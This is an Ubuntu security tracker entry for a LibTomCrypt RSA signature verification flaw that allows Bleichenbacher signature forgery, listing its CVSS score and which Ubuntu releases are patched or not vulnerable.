Your submission was sent successfully! Close


Published: 13 February 2017

The rsa_verify_hash_ex function in rsa_verify_hash.c in LibTomCrypt, as used in OP-TEE before 2.2.0, does not validate that the message length is equal to the ASN.1 encoded data length, which makes it easier for remote attackers to forge RSA signatures or public certificates by leveraging a Bleichenbacher signature forgery attack.

From the Ubuntu security team

It was discovered that LibTomCrypt incorrectly handled RSA signatures or public certificates. An attacker could possibly use this issue to make a Bleichenbacher signature forgery attack.



CVSS 3 base score: 7.5


Package Release Status
Launchpad, Ubuntu, Debian
Upstream Needs triage

Ubuntu 18.04 LTS (Bionic Beaver) Not vulnerable
Ubuntu 16.04 ESM (Xenial Xerus)
Released (1.17-7ubuntu0.1)
Ubuntu 14.04 ESM (Trusty Tahr)
Released (1.17-5ubuntu0.1)